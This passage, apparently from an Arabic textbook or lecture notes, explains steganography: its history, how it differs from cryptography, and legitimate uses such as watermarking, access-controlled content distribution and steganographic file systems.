‫ﻛﻠﻣﺔ ‪ Steganography‬أﺳﺎﺳﺎ ﻣﺷﺗﻘﺔ ﻣن ﻛﻠﻣﺔ ﯾوﻧﺎﻧﯾﺔ وﺗﻌﻧﻲ “اﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ” ﻣن اﻟﻛﻠﻣﺔ )‪ ,"steganos",( στεγανός‬ﺳﺗﯾﻐﺎﻧوس‪،‬‬
‫وﺗﻌﻧﻲ اﻟﻣﺣﻣﻲ أو اﻟﻣﻐطﻰ‪ ،‬واﻟﻛﻠﻣﺔ )‪ ،”graphei",( γραφή‬ﻏراﻓﻲ‪ ،‬وﺗﻌﻧﻲ اﻟﻛﺗﺎﺑﺔ‪ .‬ﻣوﺿوع إرﺳﺎل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻋن طرﯾﻖ ﺣﺟب أن‬
‫ھﻧﺎك ﺷﻲء ﻣرﺳل ﻣن اﻷﺳﺎس‪ .‬ھﻲ طرﯾﻘﺔ وﻓﻛرة ﻗدﯾﻣﺔ وﻟﮭﺎ ﻗﺻﺔ ﺗﺎرﯾﺧﯾﺔ ﻓﻘدﻣﺎء اﻹﻏرﯾﻖ اﻋﺗﺎدوا ﻣﺛﻼً ﺣﻔر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ طﺎوﻻت‬
‫ﻣن اﻟﺧﺷب‪ ،‬ﺛم ﯾﻐطوﻧﮭﺎ ﺑطﺑﻘﮫ ﻣن اﻟﺷﻣﻊ‪ .‬وﺣﯾن ﺗﺻل اﻟرﺳﺎﻟﺔ ﻋﻠﻰ اﻟﺷﺧص اﻟﻣﻘﺻود‪ ،‬ﯾﻘوم ﺑﺈزاﻟﺔ أو إذاﺑﺔ اﻟﺷﻣﻊ ﻟﯾﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺗﮫ‪.‬‬
‫ﻛذﻟك اﺳﺗﺧدم اﻹﻏرﯾﻖ وﺳﯾﻠﺔ أﺧرى ﻟﻧﻔس اﻟﻐرض‪ ،‬وإن ﻛﺎﻧت وﺣﺷﯾﺔ ﺑﻌض اﻟﺷﻲء‪ ،‬ﺑﻣﻘﺎﯾﯾس ﻋﺻرﻧﺎ ﺑﺎﻟطﺑﻊ‪ .‬ﺣﯾث ﻛﺎﻧوا ﯾﻘوﻣون ﺑﺣﻠﻖ‬
‫رؤوس اﻟﻌﺑﯾد‪ ،‬ﺛم ﯾﺗم )وﺷم( اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھذه اﻟرؤوس اﻟﺑﺎﺋﺳﺔ‪ .‬ﺑﻌدھﺎ ﯾﺣﺑﺳون اﻟﺷﺧص ﺣﺗﻰ ﯾطول ﺷﻌره‪ ،‬ﻓﯾﻐطﻲ ﻓروة رأﺳﮫ‬
‫)واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣﻌﮭﺎ(‪ ،‬وﯾرﺳﻠوﻧﮫ إﻟﻰ اﻟطرف اﻵﺧر‪ .‬وﺣﯾن ﯾﺻل إﻟﻰ ھﻧﺎك‪ ،‬ﯾﻘوم ھذا اﻷﺧﯾر ﺑﺣﻠﻖ رأس اﻟﻌﺑد‪ ،‬وﯾﻘرأ اﻟرﺳﺎﻟﺔ‪ .‬وﻓﻲ‬
‫اﻟﻌﺻر اﻟﺣدﯾث ﻛﺎن اﻟﺣﺑر اﻟﺳري أﺣد أھم أدوات اﻟﻌﻣﻼء واﻟﻣﺧﺑرﯾن ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ‪.‬‬
‫وﻓﻲ اﻟﻌﺎﻟم اﻟرﻗﻣﻲ‪ ،‬ﯾﺗم إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت واﻟﻣﻠﻔﺎت‪ ،‬داﺧل أﻧواع ﻋدﯾدة وﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻣﻠﻔﺎت‪ .‬ﻛﻣﺎ أن أﺣد اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ظﮭرت‬
‫ﻧﺗﯾﺟﺔ ﻟﮭذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ھﻲ إﻧﺷﺎء ﺣﯾز ‪ Partition‬داﺧل اﻟﻘرص اﻟﺻﻠب‪ ،‬ﯾُﻔ ّﻌل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺗﺷﻐﯾل اﻟﺟﮭﺎز وﯾﺳﺗﺧدم ﻟﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣراد‬
‫إﺧﻔﺎؤھﺎ‪ .‬أول ﺗﺳﺟﯾل ﻻﺳﺗﺧدام ھذا اﻟﻣﺻطﻠﺢ ﻛﺎن ﺳﻧﺔ ‪ 1499‬ﻣن ﻗﺑل ﯾوھﺎﻧس ﺗرﯾﺛﯾﻣوس"‪ ، "Johannes Trithemius‬ﻓﻲ ﻣﻘﺎﻟﺗﮫ‬
‫"‪"steganographia‬ﻋن اﻟﺗﺷﻔﯾر واﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ ﻋﻠﻰ ﺻورة ﻛﺗﺎب ﺗﻌﺎوﯾذ ﺳﺣرﯾﺔ‪ .‬وﻋﻣوﻣﺎً‪ ،‬ﻓﺈن اﻟرﺳﺎﺋل ﺳﺗظﮭر ﻋﻠﻰ أﻧﮭﺎ ﺷﻲء ﻣﻐﺎﯾر‬
‫ﻛﺻور أو ﻣﻘﺎﻻت أو ﻗواﺋم ﺑﯾﻊ أو أﺷﯾﺎء أﺧرى "ﻧص ﻏطﺎء”‪. "cover text‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪454‬‬

‫اﻟﻣﻔﮭوم اﻟﺗﻘﻠﯾدي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ھو أن ﺗﻛون ﻣﻛﺗوﺑﺔ ﺑﺣﺑر ﺧﻔﻲ ﺑﯾن اﻟﺳطور اﻟﻣرﺋﯾﺔ ﻟرﺳﺎﻟﺔ ﺧﺎﺻﺔ‪ .‬إن ﻣﯾزة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﻠﻰ اﻟﺗﺷﻔﯾر‬
‫اﻟﻣﺟرد‪ ،‬ھو أن اﻟرﺳﺎﻟﺔ ﺑﺣد ذاﺗﮭﺎ ﻻ ﺗﺟذب اﻻھﺗﻣﺎم‪ .‬اﻟرﺳﺎﺋل اﻟﻣﺷﻔرة ﺑوﺿوح‪ ،‬ﺑﻐض اﻟﻧظر ﻋن ﻗﺎﺑﻠﯾﺔ ﻓﻛﮭﺎ ﺗﺑدو ﻣرﯾﺑﺔ؛ ورﺑﻣﺎ ﯾُدان ﻛﺎﺗﺑﮭﺎ‬
‫ﻓﻲ اﻟﺑﻠدان اﻟﺗﻲ ﺗﻣﻧﻊ اﻟﺗﺷﻔﯾر ]‪ [1‬وﻓﻲ اﻟوﻗت اﻟذي ﯾﺣﻣﻲ اﻟﺗﺷﻔﯾر ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ أن ﯾﺣﻣﻲ اﻟرﺳﺎﻟﺔ وأطراف اﻟﺗراﺳل‬
‫ﻣﻌﺎ ً‪.‬‬

‫ﯾﺷﻣل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﻠﻔﺎت اﻟﺣﺎﺳوب‪ .‬ﻓﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﯾﻣﻛن ان ﯾﺗﺿﻣن اﻻﺗﺻﺎل اﻻﻟﻛﺗروﻧﻲ ﺗرﻣﯾزا ﻣﺧﻔﯾﺎ‬
‫ﻓﻲ ﻣﺳﺗوى اﻟوﺳط اﻟﻧﺎﻗل‪ ،‬ﻣﺛل ﻣﻠف ﻣﺳﺗﻧد‪ ،‬ﻣﻠف ﺻورة‪ ،‬ﺑروﺗوﻛول‪ .‬ﻣﻠﻔﺎت اﻟوﺳﺎﺋط اﻟﻣﺗﻌددة ھﻲ اوﺳﺎط ﻣﺛﺎﻟﯾﺔ ﻟﻺرﺳﺎﻻت اﻟﻣﺧﻔﯾﺔ‪ ،‬ﺑﺳﺑب‬
‫ﻛﺑر ﺣﺟﻣﮭﺎ‪ .‬ﻛﻣﺛﺎل ﺑﺳﯾط‪ ،‬ﯾﻣﻛن ﻟﻣرﺳل أن ﯾﺳﺗﺧدم ﺻورة ﻏﯾر ﻣﻠﻔﺗﺔ‪ ،‬وﯾﻌدل ﻓﻲ ﻟون ﻧﻘطﺔ )‪ (pixel‬ﻟﻛل ﻣﺋﺔ ﻣن اﻟﻧﻘﺎط‪ ،‬ﻟﯾﻘﺎﺑل ﺣرف‬
‫اﺑﺟدي‪ .‬ﺳﯾﻛون اﻟﺗﻐﯾﯾر طﻔﯾﻔﺎ وﻏﯾر ﻣﺣﺳوس وﻣن ﻏﯾر اﻟﻣﺣﺗﻣل اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﻌﯾن اﻟﻣﺟردة‪.‬‬

‫اﻟﻔرق ﺑﯾن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﺗﺷﻔﯾر؟‬


‫اﻟﻛﺛﯾر ﻟدﯾﮫ ﺧﻠﻔﯾﺔ أو ﺳﻣﻊ ﺑﻣﺻطﻠﺢ اﻟﺗﺷﻔﯾر ‪ Cryptography‬واﻟذي ﯾﻌﻧﻲ ﺑﺎﺧﺗﺻﺎر ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺔ ﻟﺗﺻﺑﺢ ﻏﯾر ﻣﻔﮭوﻣﺔ وﻏﯾر ﻗﺎﺑﻠﺔ‬
‫ﻟﻠﻘراءة إﻻ ﻣن ﻗﺑل اﻟﺷﺧص اﻟذي ﯾﻣﺗﻠك ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر ﻟﻔك اﻟﺷﻔرة‪ .‬طﺑﻌﺎ ﻏرض اﻟﺗﺷﻔﯾر ﯾﻛون داﺋﻣﺎ ﻟﻐرض ﺣﻣﺎﯾﺔ وأﻣن اﻟﻣﻌﻠوﻣﺎت وأﺳﺑﺎب‬
‫ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺎت ﻛﺛﯾرة‪ ،‬ﻣﻧﮭﺎ ﻟﻐرض ﺗﺑﺎدل ﺑﯾﺎﻧﺎت ﺳرﯾﺔ ﺑﯾن ﺷرﻛﺎت ﻣﻌﯾﻧﺔ أو ﺑﯾن دواﺋر ﺣﻛوﻣﯾﺔ ﻣﻌﯾﻧﺔ ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪.‬‬
‫وﻟﻛن اﻟﻣﺻطﻠﺢ ‪ Steganography‬واﻟذي ﯾﻌﻧﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑﺎﻟﻌرﺑﯾﺔ ﯾﺧﺗﻠف ﻋن اﻟﺗﺷﻔﯾر ﺑﺎﻟرﻏم ﻣن وﺟود اﻟﻛﺛﯾر ﻣن اﻟﺗﺷﺎﺑﮫ ﺑﯾﻧﮭﻣﺎ‪.‬‬
‫ھﻧﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﯾﻌﻧﻲ ﺗﺧﺑﺋﺗﮭﺎ داﺧل وﺳﯾط أو ﺗﺣت ﻏطﺎء ﻣﻌﯾن ﺣﺗﻰ ﻻ ﯾﺗﺳﻧﻰ ﻷي ﺷﺧص ﻣﻌرﻓﺔ أن ھﻧﺎك ﻣﻌﻠوﻣﺎت ﻣﺧﻔﯾﺔ ﻣن‬
‫اﻷﺳﺎس‪.‬‬
‫إذا ﻧﺳﺗطﯾﻊ اﻟﻘول إن اﻟﻔرق اﻷﺳﺎﺳﻲ ﺑﯾن اﻟﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ھو أن ﻋﻧد ﺗﺷﻔﯾر ﻣﻌﻠوﻣﺔ ﻣﺎ ﯾﺳﺗطﯾﻊ اﻟطرف اﻟﺛﺎﻟث ﻣﻌرﻓﺔ أن ھﻧﺎك‬
‫إﺗﺻﺎل ﯾﺗم ﻣﺎ ﺑﯾن ﺷﺧﺻﯾن أو ﻣﺟﻣوﻋﺗﯾن ﻟﻛﻧﮫ ﻻ ﯾﺳﺗطﯾﻊ ﻓﮭم اﻟﻣﻌﻠوﻣﺎت ﻷﻧﮭﺎ ﻣﺷﻔرة‪.‬‬
‫ﺑﯾﻧﻣﺎ ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻻ ﯾﻛون ھﻧﺎك ﻋﻠم ﻷي طرف ﺛﺎﻟث ﺑﺄن ھﻧﺎك ﺷﻲء ﻣﺧﻔﻲ ﻓﻲ اﻟﺧﻔﺎء أو أن ھﻧﺎك إﺗﺻﺎل ﺑﯾن إﺛﻧﯾن ﯾﺗم ﻣن وراء‬
‫اﻟﻛواﻟﯾس ﻷﻧﮫ ﺗم اﺳﺗﺧدام وﺳﯾط ﻣﺎ ﻹﺧﻔﺎء ھذا اﻻﺗﺻﺎل‪.‬‬
‫اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﯾوﺿﺢ أﻧواع وطرق ﺣﺟب اﻟﺑﯾﺎﻧﺎت واﻟﺗﻲ ﻣن ﺑﯾﻧﮭﺎ اﻟﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت واﻷﻗﺳﺎم اﻟﻔرﻋﯾﺔ ﺗﺣت ﻛل ﻧوع‪.‬‬

‫ﻗد ﯾﺗﺳﺎءل اﻟﺑﻌض‪ .‬وﻣﺎ اﻟﺣﺎﺟﺔ إﻟﻰ إﺧﻔﺎء وﺟود اﻟﺑﯾﺎﻧﺎت وﻟم اﻟﺧوف؟ واﻟﺳﺑب ﯾﻌود إﻟﻰ وﺟود ﺣﺎﻻت ﻗد ﯾﻛون ﻓﯾﮭﺎ ﻣﺟرد وﺟود ﺷك ﻟدى‬
‫اﻟﺳﻠطﺎت أو اﻟﻌﺻﺎﺑﺎت أو ﻏﯾرھم‪ ،‬ﺑﺗﺳرب ﻣﻌﻠوﻣﺎت ﻣﺎ‪ ،‬ﻛﻔﯾل ﺑﺎﻟﻘﺿﺎء ﻋﻠﻰ ﺣﯾﺎة إﻧﺳﺎن! ﻛﻣﺎ ﻓﻲ ﺣﺎﻻت اﻧﺗﮭﺎﻛﺎت اﻟﺳﻠطﺎت ﻟﺣﻘوق اﻹﻧﺳﺎن‪،‬‬
‫وأﺛﻧﺎء اﻟﺣروب اﻷھﻠﯾﺔ‪ ،‬أو وﻟﻠﻣراﺳﻠﯾن واﻟﺻﺣﻔﯾﯾن اﻟذﯾن ﯾﻐطون اﻟﺣروب واﻟﻐزوات واﻟﻧزاﻋﺎت‪ ،‬اﻟراﻏﺑﯾن ﻓﻲ إﯾﺻﺎل اﻟﺣﻘﯾﻘﺔ ﻟﻠﻌﺎﻟم‪ ،‬دون أن‬
‫ﯾﻌرﺿوا ﺣﯾﺎﺗﮭم أو ﺣﯾﺎة ﻏﯾرھم ﻟﻠﺧطر‪.‬‬
‫وﻣﺛﺎل ﺟﯾد ﻋﻠﻰ ھذه اﻟﺣﺎﻻت‪ ،‬ﻣﺎ ﺣﺻل إﺑﺎن اﻟﺣرب اﻷھﻠﯾﺔ ﻓﻲ ﺟواﺗﯾﻣﺎﻻ‪ ،‬واﻟﺗﻲ ﻗﺗل ﻓﯾﮭﺎ ‪ 100000‬ﺷﺧص‪ ،‬ﻓﺑﺣﺳب ﻣﺎ ﯾذﻛره‬
‫)‪(Korhorn‬ﻓﺈن اﻟﻣﻧظﻣﺔ اﻟﻌﺎﻟﻣﯾﺔ ﻟﺣﻘوق اﻹﻧﺳﺎن )‪ (The International Center of Human Rights Research‬ﻗد ﺟﻣﻌت‬
‫ﺣواﻟﻲ ‪ 5000‬ﺷﮭﺎدة‪ ،‬ﻣن ﺷﮭود ﻋﯾﺎن‪ ،‬ﻋن طرﯾﻖ اﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ﻣﻊ اﻟﺗﺷﻔﯾر‪ ،‬ﻓﺣﺻﻠت ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت وﺣﺎﻓظت ﻋﻠﻰ ﺣﯾﺎة اﻟﺷﮭود‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪455‬‬

‫ﻛﺑﯾرا ﻣن اھﺗﻣﺎم اﻟﺑﺎﺣﺛﯾن‪ ،‬ﻟﺳﺑب ﺑﺳﯾط وھو أن ﻟﮭﺎ اﺳﺗﺧداﻣﺎت ھﺎﻣﺔ ﻓﻲ اﻟﺗﺟﺎرة اﻹﻟﻛﺗروﻧﯾﺔ‪،‬‬ ‫ﺣﺎﻟﯾًﺎ ﺗﺷﻐل اﻷﺑﺣﺎث ﻓﻲ ﻣﺟﺎل ھذه اﻟﺗﻘﻧﯾﺔ‪ً ،‬‬
‫ﺣﯾزا ً‬
‫اﻟﺗﻲ ﺗزداد ﺗطﺑﯾﻘﺎﺗﮭﺎ‪ ،‬واﻻھﺗﻣﺎم ﺑﮭﺎ ﯾو ًﻣﺎ ﺑﻌد آﺧر‪ .‬ﺣﯾث ﻣن ﺗطﺑﯾﻘﺎﺗﮭﺎ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ أو ﻣﺎ ﯾﻌرف ﺑـ )‪ .(Watermarks‬وﺗﺳﺗﺧدم ھذه‬
‫اﻷﺧﯾرة ﻓﻲ ﻋﻣﻠﯾﺎت ﺣﻔظ اﻟﺣﻘوق ﻟﻠﻣﻧﺗﺟﺎت اﻟرﻗﻣﯾﺔ‪ ،‬واﻟﺣد ﻣن ﻋﻣﻠﯾﺎت اﻟﻘرﺻﻧﺔ‪ ،‬ﻣﺛل اﻷﺳطواﻧﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣوﺳﯾﻘﻰ وﻏﯾرھﺎ‪ ،‬وﻛذﻟك‬
‫اﻟﺻور واﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺑﺎع ﻋﺑر اﻹﻧﺗرﻧت‪ .‬ﻓﺑﺎﻟرﻏم ﻣن أن اﻟﻣﺷﺗري ھﻧﺎ ﻗد ﯾﻌﻠم ﺑوﺟود ھذه اﻟﻌﻼﻣﺎت‪ ،‬ﻟﻛﻧﮫ ﻻ ﯾﻌرف أﯾن ﺗوﺟد داﺧل اﻟﻣﻧﺗﺞ‪،‬‬
‫وﻻ اﻟﺑرﻧﺎﻣﺞ اﻟذي اﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺔ اﻹﺧﻔﺎء‪ ،‬وﻻ ﻛﻠﻣﺔ اﻟﺳر وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﺻﻌب ﻋﻠﯾﮫ‪ ،‬إزاﻟﺗﮭﺎ‪ ،‬وإﻋﺎدة اﻟﻧﺳﺦ‪.‬‬

‫‪Application of Steganography‬‬

‫ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography‬ﯾﺧﺗﻠف ﻓﻲ ﻛﺛﯾر ﻣن ﻣﻧطﻘﮫ اﻟﻰ أﺧرى واﻟﻣﻧطﻘﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﺎ اﻟﻣﯾزة ﻣن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫واﻻﺳﺗﻔﺎدة ﻣﻧﮭﺎ‪ .‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﯾﻧطﺑﻖ ﻋﻠﻰ اﻻﺗﻲ‪:‬‬
‫‪Access Control System for Digital Content Distribution‬‬

‫ﻓﻲ 'ﻧظﺎم ﻣراﻗﺑﺔ اﻟوﺻول' ﻟﻧظﺎم 'ﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ'‪ ،‬اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﺗﻛون 'ﻣﺧﻔﯾﺔ'‪ ،‬وﻟﻛﻧﮭﺎ 'ﻣﻔﺳره' ﻹﻋﻼن اﻟﻣﺣﺗوى‪.‬‬
‫اﻟﯾوم‪ ،‬أﺻﺑﺣت اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺗوزع ﺑﻛﺛره ﻋﺑر ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أﻛﺛر ﻣن ذي ﻗﺑل‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺷرﻛﺎت اﻟﻣوﺳﯾﻘﻰ ﺗﻘوم ﺑﺎﻹﻓراج‬
‫ﻋن أﻟﺑوﻣﮭﺎ اﻟﺟدﯾد ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭﺎ ﺑطرﯾﻘﺔ ﻣﺟﺎﻧﯾﺔ أو ﻣﻘﺎﺑل اﻟﻣﺎل‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺎن ﻛﺎﻓﺔ اﻟﻣﺣﺗوﯾﺎت ﯾﻣﻛن ﺗوزﯾﻌﮭﺎ‬
‫ﺑﺎﻟﺗﺳﺎوي ﻋﻠﻰ اﻟﻧﺎس اﻟذﯾن ﯾﻣﻛﻧﮭم اﻟوﻟوج‪/‬اﻟوﺻول إﻟﻰ اﻟﺻﻔﺣﺔ‪ .‬ﻟذﻟك‪ ،‬ﻻ ﺗﺗﻧﺎﺳب ﻣﻊ ﻣﺧطط ﺗوزﯾﻊ اﻟوﯾب اﻟﻌﺎدﯾﺔ )ﺣﺎﻟﺔ ﺑﺣﺎﻟﺔ(‪ ،‬واﻟﺗوزﯾﻊ‬
‫'اﻻﻧﺗﻘﺎﺋﻲ'‪ .‬ﺑﺎﻟطﺑﻊ ﻣن اﻟﻣﻣﻛن داﺋﻣﺎ ً إرﻓﺎق اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺑرﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ وإرﺳﺎﻟﮭﺎ إﻟﻰ اﻟﻌﻣﻼء‪ .‬وﻟﻛن ھذا ﺳوف ﯾﺄﺧذ اﻟﻛﺛﯾر‬
‫ﻣن اﻟﺗﻛﺎﻟﯾف ﻓﻲ اﻟوﻗت واﻟﻌﻣل‪.‬‬
‫ﻓﻣﺎذا إذا ﻛﺎن ﻣن اﻟﻣﻣﻛن ﺗﺣﻣﯾل ھذا اﻟﻣﺣﺗوى ﻋﻠﻰ اﻹﻧﺗرﻧت ﺑطرﯾﻘﺔ ﺳرﯾﺔ‪ .‬ﺛم اﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ إﺻدار ﺧﺎص ﺑك ﻣن 'ﻣﻔﺗﺎح اﻟوﺻول'‬
‫واﻟذي ﺑواﺳطﺗﮫ ﺳوف ﺗﻘوم ﺑﺎﺳﺗﺧراج اﻟﻣﺣﺗوى ﺑﺷﻛل اﻧﺗﻘﺎﺋﻲ‪ ،‬ﻓﺈﻧك ﺳوف ﺗﻛون ﺳﻌﯾدة ﺟدا ً ﺑذﻟك‪ .‬ﻟذﻟك ﻣﺧطط ‪ Steganography‬ﯾﻣﻛن أن‬
‫ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﻘﯾﻖ ھذا اﻟﻧوع ﻣن اﻟﻧظﺎم‪.‬‬

‫ھﻧﺎ ﻗﻣﻧﺎ ﺑﺗطوﯾر اﻟﻧﻣوذج اﻷوﻟﻰ )‪(prototype‬ﻣن "ﻧظﺎم ﻣراﻗﺑﺔ اﻟدﺧول)‪ " (Access Control System‬ﻟﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﻣن‬
‫ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺗﺷرح اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ ھذا اﻟﻣﺧطط‪.‬‬
‫‪ -1‬ﻣﺎﻟك اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﯾﻘوم ﺑﺗﺻﻧﯾف اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﻓﻲ ﺻورة ﻣﺟﻠد ﻣن اﻟﻣﺟﻠدات‪ ،‬وﺗﺿﻣﯾن ھذه اﻟﻣﺟﻠدات ﻛﺎﻣﻠﺔ ﻓﻲ وﻋﺎء‬
‫ﻛﺑﯾر وﻓﻘﺎ ﻷﺳﻠوب ‪ Steganography‬اﻟﻣﺳﺗﺧدم ﯾﺣﺗﺎج اﻟﻰ ﻣﻔﺎﺗﯾﺢ ﻟﻠوﺻول إﻟﻰ ھذه اﻟﻣﺟﻠدات‪ ،‬ﺛم ﺗﺣﻣﯾل ھذا اﻟوﻋﺎء اﻟﻣﺿﻣن‬
‫ﻟﻠﻣﺣﺗوى ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ‪.‬‬
‫‪ -2‬ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮫ ﺻﺎﺣب اﻟﻣﺣﺗوى ﯾﻘوم ﺑﺷرح اﻟﻣﺣﺗوى ﺑطرﯾﻘﮫ ﻣﺗﻌﻣﻘﺔ وﻧﺷرھﺎ ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم‪ .‬وﯾﺗم ﻧﺷر‬
‫ﻣﻌﻠوﻣﺎت اﻻﺗﺻﺎل ﻟﺻﺎﺣب اﻟﻣﺣﺗوى أﯾﺿﺎ )اﻟﻌﻧوان‪ ،‬ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ورﻗم اﻟﮭﺎﺗف‪ ،‬اﻟﺦ( ھﻧﺎك‪.‬‬
‫‪ -3‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﯾﺗﻠﻘﻰ اﻟﻣﺎﻟك طﻠﺑﺎت اﻟوﺻول ﻟﻠﻣﺣﺗوى ﻣن ﻗﺑل اﻟﻌﻣﻼء اﻟذﯾن ﺷﺎھدوا ﺻﻔﺣﺔ اﻟوﯾب‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﯾﺟوز ﻟﻠﻣﺎﻟك )أو‬
‫ﻗد ﻻ( ﺑﺈﻧﺷﺎء ﻣﻔﺗﺎح وﺻول وﺗﻘدﯾﻣﮭﺎ إﻟﻰ اﻟﻌﻣﻼء )ﻣﺟﺎﻧﺎ أو ﻣﻘﺎﺑل اﻟﻣﺎل(‪.‬‬
‫ﻓﻲ ھذه اﻻﻟﯾﮫ ﻓﺎن اھم ﻧﻘطﮫ ھو اﻻﺳﺗﺧراج اﻻﻧﺗﻘﺎﺋﻲ ھل ھو ﻣﻣﻛن أم ﻻ‪.‬‬
‫‪Steganography File Systems‬‬

‫‪ Steganography File Systems‬ھﻲ ﻧوع ﻣن أﻧظﻣﺔ اﻟﻣﻠﻔﺎت‪ ,‬أول ﻣن اﻗﺗرﺣﮫ روس أﻧدرﺳون‪ ،‬روﺟر ﻧﯾدام‪ ،‬وادي ﺷﺎﻣﯾر‪ .‬وھذه ﺗﻘدم‬
‫طرﯾﻘﺗﯾن رﺋﯾﺳﯾﺗﯾن ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ :‬ﺑﺎﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻣن اﻟﻣﻠﻔﺎت ذات اﻟﺣﺟم اﻟﺛﺎﺑت واﻟﺗﻲ ﺗﺗﺄﻟف أﺻﻼً ﻣن اﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ ﻋﻠﻰ رأﺳﮭﺎ‬
‫'ﻧﺎﻗﻼت)‪ '(vector‬واﻟﺗﻲ ﯾﺗم ﻓرﺿﮭﺎ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﻣﺳﺗوﯾﺎت اﻷﻣن ﺑﻔك ﺗﺷﻔﯾر ﺟﻣﯾﻊ اﻟﻣﺳﺗوﯾﺎت اﻻدﻧﻰ وﻟﻛن ﻻ ﺗﻌﻠم ﺑوﺟود ﻣﺳﺗوﯾﺎت اﻻﻣن‬
‫اﻷﻋﻠﻰ‪ ،‬أو ﻗﺳم ﻛﺎﻣل ﻣﻠﻲء ﺑﺎﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ واﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ذﻟك‪.‬‬

